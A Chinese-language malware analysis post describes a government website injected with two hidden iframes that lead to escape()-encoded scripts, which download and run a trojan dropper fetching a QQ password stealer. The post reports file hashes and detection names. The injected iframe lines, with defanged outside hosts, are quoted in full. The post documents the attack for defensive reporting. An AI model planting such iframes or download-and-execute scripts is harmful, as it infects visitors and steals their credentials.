下载Trojan-PSW.Win32.QQPass.ra等恶意程序的政府网站

简介: 下载Trojan-PSW.Win32.QQPass.ra等恶意程序的政府网站

网页首部被加入两段代码:

代码段1:

/---------
<iframe height=0 width=0 src="hxxp://ip-ie.www***113.cnidc.cn/w***m/"></iframe>
----------/

w***m.htm的内容为的内容为 escape( ) 加密的代码,解密后的内容为 JavaScript 脚本程序,利用 Microsoft.XMLHTTP、Adodb.Stream 下载 /mc/111.exe,保存为 c:/boot.exe,通过Shell.Application 的 ShellExecute方法 运行。

代码段2:

/---------
<iframe height=0 width=0 src="hxxp://www.z***zy***qr.com.**/f***j/wm**.htm/"></iframe>
----------/

wm**.htm  的内容为 escape( ) 加密的代码,解密后的内容为一段 JavaScript脚本程序,也是利用 Microsoft.XMLHTTP、Adodb.Stream 下载 /mc/game/fj.exe,保存为 c:/boot.exe,通过Shell.Application 的 ShellExecute方法 运行。

fj.exe 采用 Borland Delphi Setup Module 制作,

/---------

获取文件版本信息大小失败!

创建时间 : 2006-12-1 20:42:53

大小 : 15872 字节 15.512 KB

MD5 : 945db5a79cf5e1a0cf097cbb30af858e

---------/

Kaspersky 报为 Trojan-Downloader.Win32.Delf.ajm。

fj.exe 会从同一网站下载下列文件:

1)/mc/bao/fujia.exe

,采用UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo 制作,

/---------

大小 : 39069 字节 38.157 KB

MD5 : 9ac6f3cb5741973297c2be2b282f19b9

---------/

Kaspersky 报为 Trojan-PSW.Win32.QQPass.ra。

2)/mc/pqpq.exe

采用nSPack 1.3 -> North Star/Liu Xing Ping 加壳。

/---------


相关文章
|
3月前
|
安全
某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg
某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg
|
3月前
|
安全 JavaScript 前端开发
某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy
某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy
|
3月前
|
安全 网络协议
刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码
刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码
|
3月前
|
安全 Windows
遭遇RootKit.Win32.GameHack.GEN,Trojan.PSW.Win32.GameOL.GEN,RootKit.Win32.Mnless等2
遭遇RootKit.Win32.GameHack.GEN,Trojan.PSW.Win32.GameOL.GEN,RootKit.Win32.Mnless等2
|
3月前
|
安全
遭遇RootKit.Win32.GameHack.GEN,Trojan.PSW.Win32.GameOL.GEN,RootKit.Win32.Mnless等1
遭遇RootKit.Win32.GameHack.GEN,Trojan.PSW.Win32.GameOL.GEN,RootKit.Win32.Mnless等1
|
3月前
|
安全 Shell
遭遇Trojan-Spy.Win32.Delf.uv,Trojan.PSW.Win32.XYOnline,Trojan.PSW.Win32.ZhengTu等1
遭遇Trojan-Spy.Win32.Delf.uv,Trojan.PSW.Win32.XYOnline,Trojan.PSW.Win32.ZhengTu等1
|
3月前
|
监控 安全 数据安全/隐私保护
遭遇Trojan-PSW.Win32.WOW,Trojan.PSW.Win32.OnlineGames,Trojan.MnLess.kks等1
遭遇Trojan-PSW.Win32.WOW,Trojan.PSW.Win32.OnlineGames,Trojan.MnLess.kks等1
|
3月前
|
安全 数据安全/隐私保护
01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)
01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)
|
3月前
|
安全
遭遇RootKit.Win32.GameHack,Trojan.PSW.Win32.QQPass,Trojan-PSW.Win32.OnLineGames等1
遭遇RootKit.Win32.GameHack,Trojan.PSW.Win32.QQPass,Trojan-PSW.Win32.OnLineGames等1
遭遇 Trojan-PSW.Win32.QQPass,Trojan.PSW.Win32.GameOL等1
遭遇 Trojan-PSW.Win32.QQPass,Trojan.PSW.Win32.GameOL等1